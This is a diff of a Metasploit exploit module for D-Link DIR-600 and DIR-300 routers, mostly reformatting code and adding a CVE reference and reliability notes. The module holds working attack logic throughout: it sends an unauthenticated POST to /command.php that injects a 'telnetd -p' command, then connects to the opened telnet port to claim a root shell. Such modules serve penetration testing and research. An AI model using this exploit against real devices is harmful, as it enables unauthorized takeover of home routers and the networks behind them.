@@ -9,22 +9,23 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
-      'Description' => %q{
-        Various D-Link Routers are vulnerable to OS command injection via the web
-        interface. The vulnerability exists in command.php, which is accessible without
-        authentication. This module has been tested with the versions DIR-600 2.14b01,
-        DIR-300 rev B 2.13.
-      },
-      'Author'      =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'D-Link Devices Unauthenticated Remote Command Execution',
+        'Description' => %q{
+          Various D-Link Routers are vulnerable to OS command injection via the web
+          interface. The vulnerability exists in command.php, which is accessible without
+          authentication. This module has been tested with the versions DIR-600 2.14b01,
+          DIR-300 rev B 2.13.
+        },
+        'Author' => [
           'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
           'juan vazquez' # minor help with msf module
         ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2013-10048' ],
           [ 'OSVDB', '89861' ],
           [ 'EDB', '24453' ],
           [ 'BID', '57734' ],
@@ -32,32 +33,36 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
           [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
         ],
-      'DisclosureDate' => '2013-02-04',
-      'Privileged'     => true,
-      'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Payload'     =>
-        {
-          'Compat'  => {
-            'PayloadType'    => 'cmd_interact',
+        'DisclosureDate' => '2013-02-04',
+        'Privileged' => true,
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
             'ConnectionType' => 'find',
           },
         },
-      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-      'Targets'        =>
-        [
-          [ 'Automatic',	{ } ]
+        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+        'Targets' => [
+          [ 'Automatic',	{} ]
         ],
-      'DefaultTarget'  => 0
-      ))
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_advanced_options(
       [
         OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
         OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
         OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
-      ])
-
+      ]
+    )
   end
 
   def tel_timeout
@@ -79,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cmd = "telnetd -p #{telnetport}"
 
-    #starting the telnetd gives no response
+    # starting the telnetd gives no response
     print_status("#{rhost}:#{rport} - Sending exploit request...")
     request(cmd)
 
@@ -106,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       Timeout.timeout(session_timeout) do
         activated = handler(sock)
-        while(activated !~ /claimed/)
+        while (activated !~ /claimed/)
           activated = handler(sock)
         end
       end
@@ -116,18 +121,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def request(cmd)
-
     uri = '/command.php'
 
     begin
       res = send_request_cgi({
-        'uri'    => uri,
+        'uri' => uri,
         'method' => 'POST',
         'vars_post' => {
           "cmd" => cmd
-          }
+        }
       })
-    return res
+      return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
     end
@@ -136,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def negotiate_telnet(sock)
     begin
       Timeout.timeout(banner_timeout) do
-        while(true)
+        while (true)
           data = sock.get_once(-1, tel_timeout)
           return nil if not data or data.length == 0
           if data =~ /\x23\x20$/
